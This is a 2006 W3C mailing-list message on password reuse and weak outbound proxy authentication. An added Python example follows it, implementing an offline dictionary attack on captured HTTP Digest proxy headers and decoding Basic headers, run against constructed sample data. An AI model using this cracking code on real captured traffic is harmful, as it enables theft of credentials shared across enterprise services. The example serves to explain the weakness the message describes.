- From: Stephen Farrell <stephen.farrell@cs.tcd.ie>
- Date: Tue, 12 Dec 2006 17:01:21 +0000
- To: "Close, Tyler J." <tyler.close@hp.com>
- Cc: W3 Work Group <public-wsc-wg@w3.org>
Close, Tyler J. wrote:
>
> Mary Ellen Zurko wrote:
>> All look good, though I think this one falls out of our scope:
>> * Passwords are reused across distinct web sites
>
> I was thinking we could address this problem through the user interface
> to the browser's password manager. For example, if the user interface
> made it easier to generate, remember and form fill passwords, perhaps
> users would do that, instead of reusing the same password at distinct
> web sites.

I guess everyone knows already, but in some networks it's very hard to get
them to do much about dodgy password re-use.

Case in point - where an outbound HTTP proxy requires proxy authentication
and checks against a RADIUS server or Active Directory. In many such cases
that password use is vulnerable to an offline dictionary attack (am I right
there that there's no SSL-to-the-proxy option? If there were, that'd be a
nice way to confuse a user anyway ;-). And in some of those cases the same
password must also be used for other services (e.g. to access intranet
pages, authenticate to IMAP, etc.). I guess the best there would be to
recommend that the admins turn off the (probably silly) outbound proxy
authentication requirement.

There are also cases where enterprises offer "intranet" access from home,
which effectively require entry of that same password over the public
Internet and in the clear.

I know of one enterprise that does all of the above in the name of
"security" and who weren't at all receptive to being told that they were
making some things worse.

S.
Received on Tuesday, 12 December 2006 17:00:35 UTC
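The offline dictionary attack the message above describes against proxy authentication, as an added example that is not part of the original post or of any WSC WG material. It assumes the proxy uses the standard HTTP Basic or Digest (RFC 2617, MD5) Proxy-Authorization schemes; the captured header, the username "alice", the realm "corp-proxy", the nonce, the password "Summer2006" and the wordlist are all constructed here, and the "capture" is generated in the block by a simulated client so that the attacker functions see nothing but header text.

```python
import base64
import hashlib
import re
from typing import Dict, Iterable, Optional, Tuple


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, nc: Optional[str] = None, cnonce: Optional[str] = None,
                    qop: Optional[str] = None) -> str:
    """RFC 2617 Digest 'response' value (MD5, with or without qop=auth).

    The client derives this from the password; anyone who saw the request on
    the wire can recompute it per candidate password, so it is offline-guessable.
    """
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_digest_header(header: str) -> Dict[str, str]:
    """Turn 'Digest k="v", k2=v2, ...' into a dict with quotes stripped."""
    scheme, _, params = header.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|[^,]*)', params)}


def crack_digest(header: str, method: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: every input except the password is in the sniffed header."""
    p = parse_digest_header(header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method, p["uri"],
                                p["nonce"], p.get("nc"), p.get("cnonce"), p.get("qop"))
        if guess == p["response"]:
            return candidate
    return None


def decode_basic(header: str) -> Tuple[str, str]:
    """Basic needs no guessing at all: the credential is only base64-encoded on the wire."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic header")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


# --- constructed sample capture (not real traffic) ---------------------------
# The true password lives only in this simulated client; the attacker
# functions above never see it, only the header it produces.
_TRUE_PASSWORD = "Summer2006"          # constructed, for the demo only
_NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
_URI = "http://example.com/"           # absolute URI, as sent to a forward proxy

_CLIENT_RESPONSE = digest_response("alice", "corp-proxy", _TRUE_PASSWORD, "GET",
                                   _URI, _NONCE, "00000001", "0a4f113b", "auth")
_DIGEST_TEMPLATE = ('Digest username="alice", realm="corp-proxy", nonce="{nonce}", '
                    'uri="{uri}", qop=auth, nc=00000001, cnonce="0a4f113b", '
                    'response="{resp}"')
CAPTURED_DIGEST = _DIGEST_TEMPLATE.format(nonce=_NONCE, uri=_URI, resp=_CLIENT_RESPONSE)
CAPTURED_BASIC = "Basic YWxpY2U6U3VtbWVyMjAwNg=="   # base64("alice:Summer2006")

# Constructed wordlist; a real attacker would use a seasonal/corporate list.
WORDLIST = ["password", "Welcome1", "Winter2005", "Summer2006", "letmein"]


if __name__ == "__main__":
    print("Digest proxy password recovered:", crack_digest(CAPTURED_DIGEST, "GET", WORDLIST))
    print("Basic proxy credential:", decode_basic(CAPTURED_BASIC))
```

The nonce stops a captured Digest header from being replayed, but it does nothing against guessing, because the observer has every input to the hash except the password. When the proxy checks that password against RADIUS or Active Directory and the same password also opens intranet pages and IMAP, one recovered value from a wordlist run is enough for all of them, which is the point the message makes about turning the proxy authentication requirement off or at least not sharing that credential.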